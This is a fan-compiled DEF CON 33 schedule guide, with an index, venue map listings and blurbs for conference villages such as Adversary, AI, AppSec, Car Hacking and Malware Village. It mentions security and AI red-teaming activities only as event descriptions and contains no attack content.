The ONE!

One Schedule to Rule them All!


Welcome to the "One Schedule to Rule them All!". Thank you for your interest by using this. This is an attempt to make things easier for you, the DEF CON attendee, to figure out the when/what/where during the chaos of DEF CON 33.

It started out simple. I had a Kindle and wanted an ebook of the schedule so I didn't have to wear out the paper pamphlet by pulling it out after every talk to figure out where to go next. Back then there was only the main DEF CON tracks, not really any Villages, and production of the ebooks were easy. Over time the Village system developed with a resulting multiplication in complexity, both for attendees and for my production. The offerings no longer include epub and mobi formats and instead now include html, csv, PDF, ical, public Google calendar, and mysql dump format files. Hopefully you'll find something of use.

The intent is still to be a resource to answer the question at the end of an hour of "What's next?"

As a general rule I do not include:

Be sure to check out the Links section at the bottom of this. Most all of the events listed here were derived from these links and a Infoboot data feed. There is much more going on at DEF CON than what is listed here.

Check out the Guides/Tips/FAQs links if you're new to Las Vegas.
Notable suggestions are:

And finally, this is only as good as the ideas and information used to generate it. I welcome your constructive suggestions and comments. Please send them to qumqats@outel.org

Have a good time at DEF CON 33!


Index of DEF CON 33 Activities


Maps List

Maps Browser

Detailed Village Info

Villages Table

Hour by Hour list of happenings, start at the top, or go to a specific day.
Schedule
 - Thursday  - Friday  - Saturday  - Sunday

Sorted list of all the Speakers Names linked to their talk's description.
Speaker List

Sorted list of all the Talk's titles linked to the talk description.
Talk Title List
Talk lists for each Village, start at the alphabetic top, or go to a specific Village.
Village Talk List
    ADV - AIV - ASV - BBV - BHV - CHV - CON - CPV - CRE - DCG - DCT - DCW - DDV - DL - ESV - GHV - HHV - HRV - ICSV - IOTV - MHV - MISC - MWV - PAYV - PGE - PHV - PLV - PSV - QTV - RTV - SEV - TELV - TRN

Descriptions and Info for all the talks.
Talk Descriptions

Contests Table
Contests

Demolabs Table
Demolabs

Workshops Table
Workshops

Paid Trainings Table
Paid Trainings

Parties, Gatherings, and Events Table
Parties Gatherings Events

DEF CON 33 Vendors
Vendors

DEF CON 33 Exhibitors
Exhibitors

DEF CON 33 Communities
Communities

The latest news from defcon.org
DEF CON News

The answer to your questsions about DEF CON overall.
DEF CON FAQ

DEF CON .org Links

Combined Schedule Sources

Interesting Links

Guides/Tips/FAQs

Maps List



Overview of the area around DEF CON 33

Click on image to view full size





LVCCW Full map of Level 1

Click on image to view full size




LVCCW map of North portion of Level 1

Click on image to view full size




LVCCW map of South portion of Level 1

Click on image to view full size




LVCCW map of South Lobby and Registration/HDA of Level 1

Click on image to view full size




LVCCW map of Hall 1 of Level 1

Click on image to view full size




LVCCW map of Hall 2 of Level 1

Click on image to view full size




LVCCW map of Hall 3 of Level 1

Click on image to view full size




LVCCW map of Hall 4 of Level 1

Click on image to view full size




LVCCW Full map of Level 2

Click on image to view full size




LVCCW map of North portion of Level 2

Click on image to view full size




LVCCW map of West portion of Level 2

Click on image to view full size




LVCCW map of East portion of Level 2

Click on image to view full size




LVCCW Full map of Level 3

Click on image to view full size




LVCCW map of North portion of Level 3

Click on image to view full size




LVCCW map of North portion of Level 3

Click on image to view full size




Workshops location - Springhill Suites

Click on image to view full size




Paid Training location - Sahara

Click on image to view full size



Map Browser


LV Strip Overview - Closeup - Sahara - Springhill
L1_Full - L1_North - L1_South
 L1_RegHDA - L1_Hall1 - L1_Hall2 - L1_Hall3 - L1_Hall4
L2_Full - L2_North - L2_West - L2_East
L3_Full - L3_North - L3_South
PDF of LVCCW DEF CON 33 map - full rez, best for zooming in
Las Vegas Convention Center - Virtual Tour

Detailed Village Info


ADV - Adversary Village

ADV Village: Talk List
Home Page: https://adversaryvillage.org
DC Village Page: #orga_40719
Location: LVCCWest-Level1-Hall2-W702 - Map
Social Media Links:
   TW @AdversaryVillag
         https://defcon.social/@AdversaryVillage
   YT https://youtube.com/AdversaryVillage
   DC http://adversaryvillage.org/discord
   TI @AdversaryVillage
   FB @AdversaryVillage
   LI @adversaryvillage


Adversary Village is a community initiative which primarily focuses on adversary simulation/emulation, purple teaming, and adversary tradecraft. The village covers offensive operations, threat/APT/ransomware simulation, breach and adversarial attack simulation, supply chain security, adversary tactics, research on nation-state-sponsored threat-actors, adversary intelligence, adversarial mindset, philosophy, and hacker survival skills.

The goal of the Adversary Village is to build an open security community for the researchers and organizations, who are putting together new means, methodologies towards the simulation-emulation of adversary tactics and collaboration.

Subsequent to feedback from past editions, Adversary Village shall focus on hosting hands-on deep technical workshops, live demonstrations, panel discussions and a ton of other hands-on activities on adversarial attack simulation/emulation, offensive tradecraft to engage and educate the community. Adversary Village would have the following hands-on activities for this year at DEF CON;

Adversary simulator and purple teaming hands-on booth

Adversary Simulator booth is a volunteer assisted activity, which has hands-on adversary emulation plans and exercises specific to a wide variety of threat-actors; these are meant to provide the participants with a better understanding of adversarial attack emulation. The booth will be hosting a simulated environment meant to recreate enterprise infrastructure, operational technology environment, which serves targets for various attack simulations. The hands-on simulator booth also hosts an activity, which would need the participants to generate their own adversary emulation plans to assess the efficacy of the defense systems based on publicly available cyber threat intelligence.

Choose-your-own-Adversary-Adventure Tabletop Game

Adversary adventure is a story-scenario based, interactive, cyber war-gaming, choose-your-own adventure model interactive game. This is a gamified version of table-top exercises which is presented to the participants as they can choose to play as an attacker, post exploitation OR a Defender who is defending against an attacker group-threat actor OR even play as a CISO who is dealing with an adversarial situation such as a ransomware incident.

Hands-on deep technical workshops

Adversary Village will feature a limited number of deep technical workshops focused on advanced adversary tradecraft and techniques.

Hands-on guided breach and offensive attack simulation exercises

This area will feature guided attack simulation exercises for participants to engage with. There will be a few scenario-focused activities, "Breach-the-Hospital", "Breach-the-Office", “Breach-the-Bank” etc., visually represented by modular-brick-LEGO sets. A simulated cyber range will be available for each scenario, providing an exact replica of an enterprise production environment. We will provide a detailed walkthrough of the attack scenarios, including Tools-Techniques-and-Procedures, commands and how-to guides, demonstrating how to attack and breach the target environment. This exercise will give participants a clear understanding of how threat actors infiltrate corporate environments.

Adversary Wars CTF

Adversary Village will be hosting "Adversary Wars CTF", where the participants will have to pose as adversaries and replicate adversarial actions against each element of a “target” organization. Adversary Wars would have real world challenge scenarios and challenges, where the participants can perform various attacks and learn new TTPs. To visualize the CTF environment, the contest area will feature a miniature model of the city made using interlocking-plastic-bricks. The breached components will be physically marked in the city model as the CTF progresses. There will be prizes, complimentary hoodies (yes, the iconic adversary village hoodies), free t-shirts, cool stickers, village coins, badges, and various other swags.

Links:
    Mastodon (defcon.social) - https://defcon.social/@AdversaryVillage
    Website - https://adversaryvillage.org/

Return to Index

AIV - Artificial Intelligence Village

AIV Village: Talk List
Home Page: https://aivillage.org/
DC Village Page: #orga_40718
DC Discord Chan: https://discord.com/channels/708208267699945503/732733090568339536
Location: LVCCWest-Level3-W314-W316 - Map
Social Media Links:
   TW @aivillage_dc
   TI @aivillage
   YT link
   DC https://discord.com/invite/GX5fhfT


Join us at the AI Village for interactive demonstrations at the intersection of AI and security. We’ve got something new this year with a full purple team demonstration from the AI Cyber League.

For the third Generative Red Team we are going to “red team” the evaluations that establish a model’s performance. We are bringing several model systems built to do different tasks each with their own model card. These model cards will define uses and restrictions the model creators want and determine what we mean by “trust” when it comes to fuzzier concepts like “can write good Rust” and “doesn’t help you hack”. This model card will be built off of open source evaluations that prove and establish how effective the model is. We will be paying bounties for findings against the evaluations that the model cards used to make their claims.

Following the success of last year's real-time deepfake demonstrations, we're taking things to the next level. This year, we're showcasing five different deepfake systems across a spectrum of computational requirements – from high-end professional setups to consumer-grade hardware that's becoming increasingly accessible. You can see how detections we have will break down as compute per dollar keeps improving.

Links:
    Website - https://aivillage.org/

Return to Index

AIxCC - Artificial Intelligence Cyber Challenge

AIxCC Village: Talk List
Home Page: https://aicyberchallenge.com/
Sched Page: https://aicyberchallenge.com/
DC Village Page: #orga_40722
Location: LVCCWest-Level1-Hall1-W404 - Map
Social Media Links:
   TW @DARPA


The AIxCC Finals will unfold at DEF CON 33 in August 2025. The top seven teams who qualified during Semifinals will compete for a grand prize of $4 million.

The AIxCC Final Competition will introduce new challenge repositories and vulnerabilities, encouraging teams to improve upon their current CRS implementations and push forward their systems' capabilities in terms of robustness, scale, and real-world impact.

Links:
    Website - https://aicyberchallenge.com/

Return to Index

APV - AppSec Village

APV Village: Talk List
Home Page: https://www.appsecvillage.com/
DC Village Page: #orga_40721
DC Discord Chan: https://discord.com/channels/708208267699945503/790973922949726228
Location: LVCCWest-Level1-Hall2-W604 - Map
Social Media Links:
   TW @AppSec_Village
   LI @appsecvillage
   YT https://www.youtube.com/c/AppSecVillage
   DC https://discord.gg/5XY8qYXd7R


Come immerse yourself in everything the world of application security has to offer. Whether you are a red, blue, or purple teamer, come learn from the best of the best to exploit software vulnerabilities and secure software. Software is everywhere, and Application Security vulnerabilities are lurking around every corner, making the software attack surface attractive for abuse. If you are just an AppSec n00b or launch deserialization attacks for fun and profit, you will find something to tickle your interest at the AppSec Village.

Software runs the world. Everything from IoT, medical devices, the power grid, smart cars, and voting apps - all have software behind them. Such a variety of topics will be reflected in our cadre of guest speakers representing all backgrounds and walks of life.

AppSec Village welcomes all travelers to choose from talks and workshops by expert community members, an all-AppSec-focused CTF, contests that challenge your mind and your skillz, and more. Bring your thirst for knowledge and passion for breaking things, and your visit to AppSec Village will be thrilling!​

Links:
    Mastodon (@AppSecVillage@defcon.social) - https://defcon.social/@AppSecVillage
    Website - https://www.appsecvillage.com/

Return to Index

ASV - Aerospace Village

ASV Village: Talk List
Home Page: https://aerospacevillage.org/
DC Village Page: #orga_40720
DC Discord Chan: https://discord.com/channels/708208267699945503/732393044363444264
Location: LVCCWest-Level1-Hall2-W503 - Map
Social Media Links:
   TW @secureaerospace
   LI @aerospace-village
   TW @hack_a_sat
   DC https://discord.gg/gV4EWuk
   YT https://www.youtube.com/c/AerospaceVillage
         https://defcon.social/@aerospacevillage


The aviation and space industries, security researchers, and the public share a common goal: safe, reliable, and trustworthy aviation and space operations. For too long, negative perceptions and fractured trust on all sides have held back collaboration between the aviation, space, and security researcher communities that has advanced safety, reliability, and security of other industries. As the traditional domains of aviation safety and cybersecurity increasingly overlap, more effective collaboration between stakeholders ensures we will be safer, sooner, together.

Through the Aerospace Village, the security research community invites industry leaders, researchers and academia interested in aviation and space security, safety, and resilience to attend, understand, collaborate together to achieve our common goals. Empathy and understanding build common ground, while acts and words likely to increase division between these two communities undermine these efforts. The Aerospace Village welcomes those who seek to improve aviation and space security, safety, and resilience through positive, productive collaboration among all ecosystem stakeholders.

Our Goal

The Aerospace Village is a volunteer team of hackers, pilots, and policy advisors who come from the public and private sectors. We believe the flying public deserves safe, reliable, and trustworthy air travel which is highly dependent on secure aviation and space operations.

Links:
    Website - https://www.aerospacevillage.org/
    Mastodon (@aerospacevillage@defcon.social) - https://defcon.social/@aerospacevillage

Return to Index

BBV - Bug Bounty Village

BBV Village: Talk List
Home Page: https://bugbountydefcon.com/
DC Village Page: #orga_40726
Location: LVCCWest-Level3-W326 - Map
Social Media Links:
   TW @BugBountyDEFCON
   YT https://www.youtube.com/BountyTalks
   TW @arl_rose
   TW @infinitelogins
   YT https://www.youtube.com/infinitelogins


The global bug bounty community has witnessed exponential growth, with thousands of members actively engaged in the field. This thriving ecosystem now represents a legitimate and sought-after profession for hackers and cybersecurity specialists. After a big success and great feedback during the first ever Bug Bounty Village during DEFCON 32, We want to be part of DEFCON 33 and keep celebrating the bug bounty community, where hunters, learners, and enthusiasts can converge, interact with top-tier hackers, attend insightful workshops, talks, and immerse themselves in hands-on activities.

With over 20 workshops, panels and talks, the Bug Bounty Village at DEFCON 32 was a huge success. The room was completely full of hackers at all times, Some of the best bug bounty hunters in the community were part of our village to share knowledge, create content, teach others, and also, to make new friends. With waiting lines of over 100 people waiting to get in for some of our workshops, we have demonstrated that there is a huge interest in Bug Bounty to remain as a specific village at DEFCON, and have that special place in the biggest hacker conference in the world, where the Bug Bounty community can connect, grow and help others become the future of Bug Bounty.

Links:
    Website - https://www.bugbountydefcon.com/

Return to Index

BHV - Bio Hacking Village

BHV Village: Talk List
Home Page: https://www.villageb.io/
DC Village Page: #orga_40723
DC Discord Chan: https://discord.com/channels/708208267699945503/735273390528528415
Location: LVCCWest-Level1-Hall2-W606 - Map
Social Media Links:
   TW @dc_bhv
   LI @biohacking-village
   YT http://youtube.com/biohackingvillage
   TI @biohackingvillage
   DC https://discord.gg/Q8ubDb5
   IG @biohacking_village
         link


At the Biohacking Village, attendees can expect an immersive, hands-on experience at the intersection of cybersecurity, healthcare, and medical technology, offering opportunities to learn, explore, and collaborate on some of the most pressing challenges in the industry.

What Attendees Can Learn at the Biohacking Village:

  1. Medical Device Security: Understand how medical devices work, the cybersecurity vulnerabilities they face, and the critical importance of securing these devices for patient safety and national security. Participate in hands-on demonstrations, such as penetration testing on virtualized devices, learning real-world techniques for identifying and addressing vulnerabilities.
  2. Critical Infrastructure Resilience: Explore the intersection of healthcare and critical infrastructure, including how hospitals and medical systems rely on interconnected technologies. Learn about best practices for securing healthcare networks, including strategies to mitigate ransomware attacks and manage incident response.
  3. Collaboration and Ecosystem Development: Discover how to work effectively with manufacturers, regulators, researchers, and practitioners to build secure and innovative healthcare technologies. Engage in discussions about fostering trust, transparency, and accountability within the cybersecurity and healthcare communities.
  4. New Technologies in Healthcare: Get hands-on with cutting-edge innovations, such as AI-driven medical devices, digital twins, and IoT-enabled healthcare systems. Learn about emerging regulatory requirements, including those surrounding AI, cybersecurity, and the EU Cyber Resilience Act (CRA).
  5. Ethical Hacking and Vulnerability Disclosure: Delve into the principles of responsible disclosure and how ethical hackers contribute to securing patient safety. Understand the legal and ethical considerations of hacking medical devices, guided by frameworks like the Hippocratic Oath for Hackers.
  6. Policy and Regulatory Insights: Gain insights into the latest global regulations, standards, and metrics impacting medical technology, such as FDA guidelines, GDPR, NIS2, and more. Participate in workshops and panels with experts discussing policy advocacy and global harmonization of cybersecurity standards.
  7. Tabletop Exercises and CTFs (Capture the Flags): Engage in interactive tabletop exercises designed to simulate real-world scenarios, from ransomware incidents to critical system failures, promoting teamwork and problem-solving. Compete in cybersecurity challenges and CTFs to test your skills in securing medical and healthcare IT systems.
  8. Networking and Community Building: Connect with a diverse group of stakeholders, including hackers, healthcare professionals, medical device manufacturers, and policymakers. Collaborate in an environment that fosters innovation, trust, and shared learning.

The Biohacking Village is your gateway to understanding and addressing the complex challenges of medical technology and cybersecurity. Attendees will leave equipped with knowledge, skills, and connections to drive meaningful change in the industry.

Links:
    Website - https://villageb.io/

Return to Index

BICV - Blacks in Cybersecurity

BICV Village: Talk List
Home Page: https://www.blacksincyberconf.com/bic-village
DC Village Page: #orga_40724
Location: LVCCWest-Level3-W322-W324 - Map
Social Media Links:
   TW @BlackInCyberCo1
         https://defcon.social/@blacksincyber
   TI @blacksincybersecurity
   YT link
   LI @blackincyberconference
   PT @blacksincybersecurity
   FB @blackincyberconf


The Blacks In Cybersecurity (B.I.C.) Village seeks to bring culturally diverse perspectives to the holistic Cybersecurity community; by way of a series of talks and a capture the flag event. In providing these activities, we hope to help highlight Black experiences, innovations in the field, Black culture and educate the community about Black history.

In doing this, we believe that we can better educate and normalize the discussion of deficiency or prejudices in Cybersecurity education/development for minority communities. We also believe this effort can be translated to aid in eradication of these issues in the Cybersecurity and Hacker/Maker community and allow for more diverse hobbyists and professionals to engage and contribute.

Links:
    Mastodon (infosec.exchange) - https://infosec.exchange/@blacksincyber
    Mastodon (defcon.social) - https://defcon.social/@blacksincyber
    Website - https://www.blacksincyberconf.com/bic-village

Return to Index

BTV - Blue Team Village

BTV Village: Talk List
Home Page: https://blueteamvillage.org/
DC Village Page: #orga_40725
DC Discord Chan: https://discord.com/channels/708208267699945503/732454317658734613
Location: LVCCWest-Level2-W213-W218 - Map
Social Media Links:
   TW @BlueTeamVillage
   TI @blueteamvillage
   YT https://www.youtube.com/c/blueteamvillage
   DC https://discord.gg/blueteamvillage
         https://defcon.social/@blueteamvillage


Blue Team Village (BTV) is both a place and a community built for and by people who defend computer systems, networks, and people against cyber attacks. It's a place to gather, talk, share, and learn from each other about the latest tools, technologies, and tactics that our community can use to detect attackers and prevent them from achieving their goals.

The Blue Team Village's Project Obsidian is a defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Malware Analysis, Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH). Deep dive into technical topics through training and exercises that provide practical hands-on experience across each discipline. Project Obsidian 101 trainings provide cybersecurity knowledge that will enable attendees to develop the skills needed to be successful in their current and future roles.

Two of the most valuable takeaways are how to strategically approach a task and the operational processes supporting each task's objectives. Knowing 'how' to do something is only part of the challenge. Knowing 'when' and 'why' to perform specific tasks adds the necessary context to develop the full story of defensive cybersecurity.

Links:
    Mastodon (@blueteamvillage@defcon.social) - https://defcon.social/@blueteamvillage
    Website - https://blueteamvillage.org/

Return to Index

CHV - Car Hacking Village

CHV Village: Talk List
Home Page: https://www.carhackingvillage.com/
DC Village Page: #orga_40727
DC Discord Chan: https://discord.com/channels/708208267699945503/732722838942777474
Location: LVCCWest-Level1-Hall2-W602 - Map
Social Media Links:
   TW @CarHackVillage
   YT http://youtube.com/@carhackingvillage
   LI @car-hacking-village
   DC https://discord.gg/JWCcTAM


For over a decade, we’ve been leading the charge in automotive security, and this year, we’re shifting into high gear! Get ready for an electrifying DEF CON 33 experience packed with interactive challenges, exclusive badges, and mind-bending exercises designed to supercharge your skills.

Join us and make this DEF CON one for the record books!

Links:
    Website - https://www.carhackingvillage.com

Return to Index

CLV - Cloud Village

CLV Village: Talk List
Home Page: https://cloud-village.org/
DC Village Page: #orga_40728
DC Discord Chan: https://discord.com/channels/708208267699945503/732733373172285520
Location: LVCCWest-Level3-W311-W313 - Map
Social Media Links:
   TW @cloudvillage_dc
   YT https://www.youtube.com/cloudvillage_dc
   DC https://discord.gg/EygUDJABee


With the industry’s rapid growth in cloud infrastructure, the presence of an open platform to discuss and showcase cloud research becomes a necessity. Cloud village is an open platform for researchers interested in the area of cloud security. We plan to organise talks, tool demos, CTF and workshops around Cloud Security and advancements.

Our CTF will be a jeopardy style 2.5 days contest where participants will have to solve challenges around Cloud infrastructure, security, recon, etc. These challenges will cover different cloud platforms including AWS, GCP, Azure, Alibaba, Digital Ocean, etc. We will also reward our top 3 teams with awards.​

Links:
    Website - https://dc33.cloud-village.org
    Mastodon (@cloudvillage_dc@mastodon.social) - https://mastodon.social/@cloudvillage_dc

Return to Index

CON - Contests

CON Village: Talk List
Home Page: https://defcon.outel.org/dcwp/dc33/activities/contests-list/
Sched Page: https://defcon.outel.org/defcon33/dc33-consolidated_page.html#villist_CON
Social Media Links:
         link

Return to Index

CPV - Crypto Privacy Village

CPV Village: Talk List
Home Page: https://cryptovillage.org/
DC Village Page: #orga_40729
DC Discord Chan: https://discord.com/channels/708208267699945503/732734002011832320
Location: LVCCWest-Level1-Hall1-W403 - Map
Social Media Links:
   TW @cryptovillage
   SL https://cryptovillage.slack.com/
   YT link
   TI @cryptovillage
         https://defcon.social/@cryptovillage


Launched in 2014, Crypto & Privacy Village (CPV) is a community-run village centred on privacy and cryptography that aims to educate and inform the general public, students, educators, hackers, security and privacy professionals, and policymakers. We provide a unique hybrid space that features talks; chill space for relaxing with friends, doing CTFs, and cross industry networking; the Gold Bug Challenge and desk for hints and support; privacy-related art installations; and an information desk for questions about privacy and cryptography. Come talk with us about facial recognition technology, privacy-preserving data analytics, or crypto backdoor laws!

Links:
    Website - https://cryptovillage.org/
    Mastodon (@cryptovillage@defcon.social) - https://defcon.social/@cryptovillage

Return to Index

DC - DEF CON Talks

DC Village: Talk List
Home Page: https://defcon.org/html/defcon-33/dc-33-speakers.html
Sched Page: https://defcon.outel.org/defcon33/dc33-consolidated_page.html#villist_DC
Social Media Links:
   TW @defcon
   FB @defcon
   YT https://www.youtube.com/user/DEFCONConference
         http://www.reddit.com/r/defcon
   IG @wearedefcon
   DC https://discord.gg/defcon

Return to Index

DCG - DEF CON Groups

DCG Village: Talk List

Return to Index

DCGVR - DEF CON Groups VR

DCGVR Village: Talk List
Home Page: https://www.dcgvr.org/
DC Forums Page:
Social Media Links:
   TW @DCGVR
   TI @defcon_groups
   DC https://discord.gg/bsX4QXf3rD
   YT link

Return to Index

DDV - Data Duplication Village

DDV Village: Talk List
Home Page: https://dcddv.org/
DC Village Page: #orga_40730
DC Discord Chan: https://discord.com/channels/708208267699945503/732732641694056478
Location: LVCCWest-Level2-W225 - Map
Social Media Links:
   TW @DDV_DC


The Data Duplication Village has all the updated bits and bytes available from infocon.org packed up into nice, neat packages.  If you're looking for a copy of just about any security con talk known to hacker-kind or a copy of the VX-Underground archive (along with a few hundred gigs of cat pictures), you'll find it here. Our village provides a "free-to-you" service of direct access to terabytes of useful data to help build those hacking skills and allow open discussions with other storage enthusiasts.

We'll also be partnering with DC Next Gen to ensure that our future generations have the opportunity to explore the details of how past and current data storage works!

Links:
    Website - https://dcddv.org/

Return to Index

DL - DEF CON DemoLabs

DL Village: Talk List
Home Page: https://forum.defcon.org/node/252635
Sched Page: https://defcon.outel.org/defcon33/dc33-consolidated_page.html#villist_DL

Return to Index

ESV - Embedded Systems Village

ESV Village: Talk List
Home Page: https://embeddedvillage.org/
DC Village Page: #orga_40731
Location: LVCCWest-Level1-Hall1-W401 - Map
Social Media Links:
   TW @EmbeddedVillage


Embedded systems exist at the intersection of hardware and software, built to accomplish a specific task. Often these disciplines are dealt with individually, but understanding the custom relationships between hardware and software is key to performing security research on these devices.

Embedded Systems Village advances the security of embedded systems by hosting hands-on hacking workshops, showcasing new security research demos, and organizing exciting hacking contests to educate attendees and manufacturers on the approach hackers use to attack these devices. Attendees will leave the village with an understanding of how to reduce complex, exotic devices to their underlying embedded components and to extract the information required to use the tools and techniques taught at other villages where embedded systems are on display.

Links:
    Website - https://embeddedvillage.org/

Return to Index

GHV - Game Hacking Village

GHV Village: Talk List
Home Page: https://gamehacking.gg/
DC Village Page: #orga_40967
Location: LVCCWest-Level1-Hall1-W402


Gaming and cybersecurity intersect in many exciting and interactive ways. Our mission is to delve into various aspects of game security, fostering an environment of exploration, play, and learning. At the Game Hacking Community, participants can engage in activities ranging from modding games to exploring the intricacies of memory hacking and multiplayer cheats and learning about game malware. Whether you're a beginner or an experienced hacker, we will have presentations and activities to challenge your skills. Be part of the evolution of game security. Dive into our activities, engage with other game hackers, and explore opportunities to contribute to and support the Game Hacking Community. Let's play, learn, exploit, and perhaps even profit. Our community focuses on learning and does NOT endorse cheating in competitive online games.

Links:
    Website - https://gamehacking.gg

Return to Index

HDA - DEF CON Hackers with Disabilities

HDA Village: Talk List
Social Media Links:
   TW @HDA_DEFCON

Return to Index

HHV - Hardware Hacking and Solder Skills Villages

HHV Village: Talk List
Home Page: https://dchhv.org/
DC Village Page: #orga_40733
DC Discord Chan: https://discord.com/channels/708208267699945503/732728536149786665
Location: LVCCWest-Level1-Hall2-W802 - Map
Social Media Links:
   TW @DC_HHV
         https://defcon.social/@DC_HHV


Every day our lives become more connected to consumer hardware. Every day the approved uses of that hardware are reduced, while the real capabilities expand. Come discover hardware hacking tricks and tips regain some of that capacity, and make your own use for things! We have interactive demos to help you learn new skills. We have challenges to compete against fellow attendees. We have some tools to help with your fever dream modifications. Come share what you know and learn something new.​

Links:
    Website - https://dchhv.org/
    Mastodon (@DC_HHV@defcon.social) - https://defcon.social/@DC_HHV

Return to Index

HRV - Ham Radio Village

HRV Village: Talk List
Home Page: https://hamvillage.org/
DC Village Page: #orga_40732
DC Discord Chan: https://discord.com/channels/708208267699945503/732733631667372103
Location: LVCCWest-Level3-W321 - Map
Social Media Links:
   TW @HamRadioVillage
   TI @HamRadioVillage
   DC https://discord.gg/hrv
         https://defcon.social/@HamRadioVillage


Ham Radio has been considered to be the original group of hackers, launching before computers, integrated circuits, and even the transistor! Hams of all generations have a hacker mindset, solving problems their own way, regardless of what the manual has to say. Continuing this pioneer spirit, the Ham Radio Community is here to support advancement of the hobby with a cybersecurity slant.

Everything we do today involves wireless communications of some sort, and a basic knowledge of how radio works is crucial. In the Ham Radio Community, you can learn hand-on with topics such as how to legally use a radio to send commands to a satellite, communicating around the globe when no other methods exist, and how to send and receive real-time location data without relying on any cellular networks. You can put your skills to the test by trying to find the hidden transmitters in the Ham Radio Fox Hunt contest, as well as transmitting memes over the airwaves to DEF CON attendees.

We provide license testing services for those looking to become licensed or upgrade their license class, as well as guidance on how to hack on the medium to achieve the best results and have the most fun!

Links:
    Website - https://hamvillage.org/

Return to Index

ICSV - Industrial Control Systems Village

ICSV Village: Talk List
Home Page: https://www.icsvillage.com/
DC Village Page: #orga_40734
DC Discord Chan: https://discord.com/channels/708208267699945503/735938018514567178
Location: LVCCWest-Level1-Hall2-W805 - Map
Social Media Links:
   TW @ICS_Village
   LI @icsvillage
   YT link
   TI @ics_village


**Mission**. ICS Village is a non-profit organization with the purpose of providing education and awareness of Industrial Control System security.

**Exhibits**. Interactive simulated ICS environments that provide safe yet realistic examples to preserve safe, secure, and reliable operations. We bring real components such as Programmable Logic Controllers (PLC), Human Machine Interfaces (HMI), Remote Telemetry Units (RTU), and actuators, to simulate a realistic environment throughout different industrial sectors. Visitors can connect their laptops to assess these ICS devices with common security scanners, network sniffers to sniff the industrial traffic, and more! We will also have space dedicated to Maritime technology as well as Escape Rooms ran by Idaho National Labs and CISA. In addition to talks, hands-on demos/hacking, and escape rooms we are collaborating with BioHacking Village to demonstrate how Industrial Control Systems are used in Health Care.

Links:
    Website - https://www.icsvillage.com/

Return to Index

IOTV - Internet Of Things Village

IOTV Village: Talk List
Home Page: https://www.iotvillage.org/
DC Village Page: #orga_40735
DC Discord Chan: https://discord.com/channels/708208267699945503/732734565604655114
Location: LVCCWest-Level1-Hall2-W605 - Map
Social Media Links:
   TW @iotvillage
   TW @ISEsecurity
   TW @Villageidiotlab
         https://defcon.social/@IoTVillage/
   TI @iotvillage
   YT https://www.youtube.com/c/IoTVillage/videos
   DC https://discord.gg/EFKbNFrFaN


IoT Village advocates for advancing security in the Internet of Things (IoT) industry through bringing researchers and industry together. IoT Village hosts talks by expert security researchers, interactive hacking labs, live bug hunting in the latest IoT tech, and competitive IoT hacking contests, including our 4 time black badge DEF CON CTF. Over the years, IoT Village has served as a platform to showcase and uncover hundreds of new vulnerabilities, giving attendees from around the globe the opportunity to learn about the most innovative techniques to both hack and secure IoT. IoT Village is organized by security consulting and research firm, [Independent Security Evaluators (ISE)](https://www.ise.io/).

Links:
    Website - https://iotvillage.org/defcon.html

Return to Index

LPV - Lock Pick Village

LPV Village: Talk List
Home Page: https://www.toool.us/
DC Village Page: #orga_40736
DC Discord Chan: https://discord.com/channels/708208267699945503/732734164780056708
Location: LVCCWest-Level1-Hall2-W701 - Map
Social Media Links:
   TW @toool
   TI @toool_us
   YT https://youtube.com/c/TOOOL-US
         https://techhub.social/@TOOOL


Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams?

Then come on by the Lockpick Village, run by The Open Organization Of Lockpickers, where you will have the opportunity to learn hands-on how the fundamental hardware of physical security operates and how it can be compromised.

The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices, techniques used to exploit these vulnerabilities, and practice on locks of various levels of difficultly to try it themselves.

Experts will be on hand to demonstrate and plenty of trial locks, pick tools, and other devices will be available for you to handle. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sport-picking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.

Links:
    Website - https://www.toool.us/

Return to Index

MHV - Maritime Hacking Village

MHV Village: Talk List
Home Page: https://maritimehackingvillage.com/
DC Village Page: #orga_40969
Location: LVCCWest-Level1-Hall2-W504
Social Media Links:
         https://x.com/maritimevillage
   LI @maritimehackingvillage


The Maritime Hacking Village (MHV) has set sail for LVCC to deliver the first and only immersive maritime hacking experience for you to learn what it takes to exploit and defend real-world maritime systems. Our mission is simple: we are creating a space for stakeholders to come together and navigate the changing tides in the maritime sector’s technological, geopolitical, and adversarial landscapes which demand ever-more-urgent collective action to address the systemic cybersecurity vulnerabilities in the systems which underpin global maritime defense and trade. Together we hack to facilitate the discovery and sharing of knowledge integral to the development of effective maritime cybersecurity policy, industry standards and regulations, vulnerability information sharing, cyber threat intelligence, and most importantly – a capable and trusted workforce and community-of-interest.

Why? Maritime infrastructure is the backbone of the global economy and order. Countries, companies, and militaries all use the sea for power projection and commerce, but no single stakeholder controls the implementation of policies and regulations. Stakeholders unanimously agree that from machines, to systems, to governance, the maritime domain is fundamentally insecure. Still, seemingly insurmountable access barriers are preventing the security community, and anyone else, from doing anything to help.

MHV has made it our purpose to eliminate these barriers – and to provide every human with the access and resources necessary to engage in maritime vulnerability research and cybersecurity innovation. Our village is a safe, shared space where the security community (elite hackers, trusted providers, and young talent alike) can develop and demonstrate their competence in attacking and defending real maritime systems – and where maritime industry stakeholders can engage with this community on neutral ground to grow their arsenals of knowledge, tools, trusted and capable providers, and fresh talent. We believe that this work together will create rising tides of awareness, information sharing, and innovation that will lift all ships and allow us to gradually secure the maritime sector.

Links:
    Website - https://maritimehackingvillage.com/
    Mastodon (@maritimehackingvillage@defcon.social) - https://defcon.social/@maritimehackingvillage

Return to Index

MISC - Misc

MISC Village: Talk List
Sched Page: https://defcon.outel.org/defcon33/dc33-consolidated_page.html#villist_MISC

Return to Index

MWV - Malware Village

MWV Village: Talk List
Home Page: https://malwarevillage.org/
DC Village Page: #orga_40968
Location: LVCCWest-Level1-Hall1-W303
Social Media Links:
         https://x.com/MalwareVillage
   LI @malwarevillage
   DC https://discord.com/invite/xQwqY48SrJ


Malware Village is dedicated to providing a safe and engaging environment for participants to learn and share knowledge about malware analysis. Our mission is to equip attendees with the skills, techniques, and historical context needed to understand, research, and combat malware. Participants will gain hands-on experience with real-world analysis techniques, guided by seasoned infosec professionals.

